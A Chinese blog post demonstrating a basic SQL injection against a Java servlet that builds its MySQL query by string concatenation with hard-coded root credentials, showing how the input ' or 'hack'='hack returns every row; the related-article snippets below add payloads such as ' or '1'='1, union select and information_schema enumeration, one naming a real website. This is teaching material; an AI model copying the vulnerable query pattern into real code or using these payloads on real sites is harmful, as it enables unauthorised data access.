一个简单的SQL注入

最新推荐文章于 2023-04-06 18:51:13 发布
最新推荐文章于 2023-04-06 18:51:13 发布
阅读量3.2k 收藏 2
点赞数 2
分类专栏: SQL 文章标签: myeclipse MyEclipse Myeclipse null NULL sql SQL Sql string String user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tounaobun/article/details/8056523
版权

本例采用JSP+Servlet+Mysql:

1. 数据库:

数据库名:sqlinject

CREATE DATABASE sqlinject;

建user表: 

       Table: user
Create Table: CREATE TABLE `user` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(20) NOT NULL,
  `sex` varchar(20) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8

表中一些记录: 

mysql> select * from user;
+----+--------+------+
| id | name   | sex  |
+----+--------+------+
|  1 | benson | m    |
|  2 | jerry  | f    |
|  3 | Mike   | m    |
|  4 | Jenny  | f    |
|  5 | Rose   | f    |
+----+--------+------+
5 rows in set (0.00 sec)

JSP页面和Servlet:

1.index.jsp:负责接受用户的输入(输入用户名和选择性别)

<%@ page contentType="text/html; charset=UTF-8" %>
<html>
	<head>
		<title>SQL注入测试</title>
	</head>
	<body>
		<form action="query.do">
			姓名:<input type="text" name="name"><br/>
			性别:<select name="sex">
				<option value="m">男</option>
				<option value="f">女</option>
			</select>
			<br/>
			<input type="submit" value="搜索"/>
		</form>
	</body>
</html>

QueryServlet处理类: 

package zjut.tsw.servlet;

import java.io.IOException;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;

import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import zjut.tsw.vo.User;

public class QueryServlet extends HttpServlet {

	/**
	 * 
	 */
	private static final long serialVersionUID = 1L;
	
	ArrayList<User> users = null;

	public void doGet(HttpServletRequest request, HttpServletResponse response)
			throws ServletException, IOException {

		request.setCharacterEncoding("utf-8");
		response.setContentType("text/html;charset=utf-8");

		// 获取姓名和性别
		String name = request.getParameter("name");
		String sex = request.getParameter("sex");

		// debug
		System.out.println("name is:" + name + "\nsex is:" + sex);

		users = query(name, sex);

		request.setAttribute("users", users);
		request.getRequestDispatcher("/query.jsp").forward(request, response);
		return;

	}

	public ArrayList<User> query(String name, String sex) {

		Connection conn = getConnection();
		if(conn == null) System.out.println("conn is null");
		Statement stmt = null;
		ResultSet rs = null;

		String sql = "select * from user where" + " sex='" + sex + "' and name='" + name + "'";
		// debug
		System.out.println(sql);

		ArrayList<User> users = new ArrayList<User>(); // 保存用户

		try {
			stmt = conn.createStatement();
			rs = stmt.executeQuery(sql);

			while (rs.next()) {
				User user = new User();
				user.setName(rs.getString("name"));
				user.setSex(rs.getString("sex"));

				users.add(user);
			}

			return users;

		} catch (SQLException e) {
			e.printStackTrace();
			return null;
		}
	}

	// connect to db
	public static Connection getConnection() {
		Connection conn = null;
		try {
			Class.forName("com.mysql.jdbc.Driver");

			conn = DriverManager.getConnection(
					"jdbc:mysql://localhost:3306/sqlinject", "root", "root");

			return conn;
		} catch (ClassNotFoundException cnfe) {
			cnfe.printStackTrace();
			return null;
		} catch (SQLException e) {
			e.printStackTrace();
			return null;
		}
	}

}

VO:User 


package zjut.tsw.vo;

public class User {

	public String getName() {
		return name;
	}

	public void setName(String name) {
		this.name = name;
	}

	public String getSex() {
		return sex;
	}

	public void setSex(String sex) {
		this.sex = sex;
	}

	private String name;
	private String sex;

	@Override
	public String toString() {
		return "username is:" + name + "sex is:" + sex;
	}

}

结果页面 query.jsp 

<%@ page contentType="text/html; charset=UTF-8"%>
<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%>
<html>
<head>
<title>查询结果</title>
</head>
<body>
	<c:forEach items="${users}" var="user">
		姓名:${user.name },性别${user.sex }<br/>
	</c:forEach>

</body>
</html>

web.xml 


<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.5" 
	xmlns="http://java.sun.com/xml/ns/javaee" 
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
	xsi:schemaLocation="http://java.sun.com/xml/ns/javaee 
	http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd">
  <servlet>
    <servlet-name>QueryServlet</servlet-name>
    <servlet-class>zjut.tsw.servlet.QueryServlet</servlet-class>
  </servlet>

  <servlet-mapping>
    <servlet-name>QueryServlet</servlet-name>
    <url-pattern>/query.do</url-pattern>
  </servlet-mapping>	
  <welcome-file-list>
    <welcome-file>index.jsp</welcome-file>
  </welcome-file-list>
</web-app>

界面效果:

登录界面:





SQL注入:




结果:


这里在姓名输入框里输入了 ' or 'hack'='hack           (hack名字是随意取的) 

在地址栏中,%27代表单引号,+号代表一个空格,%3D代表=号,可以用JAVA的URLEncoder类和URLDecoder类进行转换

所有的记录都被查询出来了。


看下MyEclipse打印的SQL调试语句:


name is:' or 'hack'='hack
sex is:m
select * from user where sex='m' and name='' or 'hack'='hack'

Over...



czjuttsw
关注
专栏目录
简单sql注入1
qq_36915061的博客
12-19 706
通过sql注入得到flag 题目:http://ctf5.shiyanbar.com/423/web 打开题目: 先随便输了些数字,发现只有1、2、3查询结果 接下来进行第一步测试 输入一个带单引号的数据,目的是测试是否存在注入点,输入1’发现报错,说明此处存在注入点。且后台代码应该是一般的seletc语句,可以通过开闭合单引号来进行注入。 输入1 and 1=1发现id后显示1 1=1说明存在...
一道简单sql注入题目
weixin_44215027的博客
11-05 2009
一道简单sql注入题目 好久都没有做ctf的题目了,最近又重新开始回顾了。首先是sql注入。这是一道简单的整数型注入题目。 首先,进入网址:http://www.kabelindo.co.id/index.php 刚开始我以为是搜索框注入,然后我发现我错了。。。。 但是,我看到了news: 这就非常的舒服,进入后果然有一个注入点 加一个单引号,会报错。加 and 1=1,不会报错。说明是一...
注入的几条简单语句,不用像网上那样复杂
得峰的专栏 [网络收藏]
05-04 737
一、版本url/1.asp?id=1 and @@VERSION>0二、跨库url/1.asp?id=1 and 1=(select db_name(n))n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?三、列名url/1.asp?id=1 and 1=(select col_name(object_id(表名),n) 表名可以换成16进制。像bbsuser=0x6200620
完成一次简单SQL 注入
wujiandao的专栏
09-03 467
先来看几起 SQL 注入的安全事件: Joomla 对象注入漏洞 事件概述:2015年10月29日国外知名CMS(内容管理系统)Joomla,爆出存在SQL注入漏洞,该漏洞影响了 1.5 到 3.4.5 的所有版本,漏洞利用无须登录,直接在前台即可执行任意PHP代码。这个漏洞在libraries/joomla/sesion/sesion...
简单SQL注入
stars77的博客
12-18 626
简单SQL注入 题目进入显示如下 0X01 手工注入 登录框里有个公告,感觉是突破口,点进去后显示如下 在这里测试是否有注入点 一、判断是否存在注入 id=2 and 1=1 id=2 and 1=2 adodb.field 错误 ‘80020009’ bof 或 eof 中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 /new_list.asp,行 0 说明...
简单sql注入入门
d2231300271的博客
03-24 403
基本流程是:观察注入点->判断参数类型-->判断列数(group by或order by)-->观察是否存在显示位(就是页面能够显示列数据的位置(实践理解)),语法报错,异常页面显示(根据不同情况选择不同的注入方式)-->根据不同的注入方式依次显示库,列,表。当前99%以上的MySQL版本都是5.0以上,都支information_schema 库(),所以我们会使用该库进行爆数据库-->爆数据表--爆数据列-->爆数据(类似于根据目录查页数然后翻到相对于的位置)字段表示的是数据库中所有的字段信息。
一个简单SQL注入攻击的例子
最新发布
06-06
防范SQL注入攻击 使用参数化查询:这是防止SQL注入的最有效方法。参数化查询确保了输入数据不会被解释为SQL代码的一部分。 例如,在Python中使用sqlite3库的参数化查询: PYTHON 复制 1 2 3 4 5 6 7 import sqlite...
SpringBoot集成Mybatis实现简单SQL注入(攻击)案例
12-14
(1)主演示就是一张t_user表,利用常见的用户登录来模拟sql注入对后台数据的侵入 (2)数据库脚本 — postgresql DROP TABLE IF EXISTS "public"."t_user"; CREATE TABLE "public"."t_user" ( "id" int8 NOT ...
sql注入讲解ppt.pptx
08-10
一、SQL 注入的特点: 1. 广泛性:SQL 注入可以发生在各种 web 应用程序中,无论是使用哪种编程语言或数据库管理系统。 2. 隐蔽性:SQL 注入攻击往往是隐蔽的,很难被发现,需要具备专业的安全知识和经验来检测和...
简单SQL注入2
雨九九的小窝
10-25 755
地址:http://ctf5.shiyanbar.com/web/index_2.php 参考资料:http://www.bubuko.com/infodetail-2301250.html 1.直接输入单引号,根据报错信息确定参数值类型为字符型 2.输入‘ or ‘1‘=‘1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入‘ ‘1‘=‘1, 仍然报错,信...
sql简单注入
weixin_51646864的博客
06-13 678
原理: 当我们在查询一些数据时,输入我们指定的查询内容后,后台会根据用户的输入来执行SQL语句查询,类似于SELECT * FROM xxx表 WHERE id=’’,而用户可以在id字段构造一些危险的查询语句。 简单union注入步骤: 这里以攻防世界的一个题目的模型进行注入。 1、判断注入漏洞: (1)and 1=1 / and 1=2 若回显页面不同则说明是整形注入,否则不是 (2)-1/+1 回显下一个或上一个页面说明是整形注入,否则不是 (3)单引号判断 ‘ 显示数据库错误信息或者页面回显不同,说
SQL Injection with MySQL
11-11 1448
本文作者:angel文章性质:原创发布日期:2004-09-16本文已经发表在《黑客防线》7月刊,转载请注明。由于写了很久,随着技术的进步,本人也发现该文里有不少错误和罗嗦的地方。请各位高手看了不要笑。本文写于《Advanced SQL Injection with MySQL》之前一个月。声明  本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有
常用SQL注入语句大全
cainiao199020的博客
12-23 2755
1.判断有无注入点 整形参数判断 1、直接加’ 2、and 1=1 3、 and 1=2 如果1、3运行异常 2正常就存在注入 字符型判断 1、直接加’ 2、and ‘1’=‘1’ 3、 and ‘1’=‘2’ 搜索型: 关键字%’ and 1=1 and ‘%’=’% 关键字%’ and 1=2 and ‘%’=’% 如果1、3运行异常 2正常就存在注入 2.猜表一般的表的名称无非是admin ...
简单sql注入
qq_31798427的博客
02-16 709
这题比较关键的地方就在于后台对不同关键字过滤方式不同。 输入数值1返回结果: ID: 1 name: baloteli 在输入1'(注意输入法): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syn
SQL注入语句
热门推荐
大头的博客
07-25 3万+
一、SQL注入语句 账号:Admin 密码:123456 登录验证语句为select * from 表名 where UserName = '用户名' and UserPassword = '用户密码";的系统可通过以下注入方式可能可绕过密码登录进入系统。 1、 Admin' or '1'='1 123(任意密码) 注释:形成一个恒为真的条件,是SQL查询判断失败 2、 Admi...
简单sql注入案例(sql语句union联合查询
hervers的博客
07-14 390
找到注入点 通过union链接sql语句查到使用到第3字段和第11字段 通过informatio_schema库分析 数据库中包括的所有库名称,所有表名称。但是出现了Illegal mix of collations for operation 'UNION'报错原来是字段编码不同导致的问题:相同字段的编码为 utf8_general_ci 与 utf8_unicode_ci ,就会报Illegal mix of collations for operation “UNION”的错误。,所以需要使用h
sql注入
qq_49714982的博客
04-06 2255
高版本:在MYSQL5.0以上版本存在一个自带数据库为information_schema,它是一个存储所有数据库名、表名、列名的数据库,相当于可以通过查询它获取指定数据库下面的表名、列名信息。id=1 and 1=2 union select 1,database(),user(),4)union select 1,2,3,4(几个列就写到几,并且让?id=1报错,比如id=-1或者 and 1=2)id=-1 union select 1,group_concat(数据项1),3,4 from。
SQL注入攻击详解与防范
SQL注入攻击的基本过程是,攻击者在应用程序的输入字段中插入恶意SQL代码,这些代码会与原本的SQL查询语句结合,形成一个新的、不安全的查询,导致数据库执行非预期的操作。例如,一个简单查询用户信息的页面可能...
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值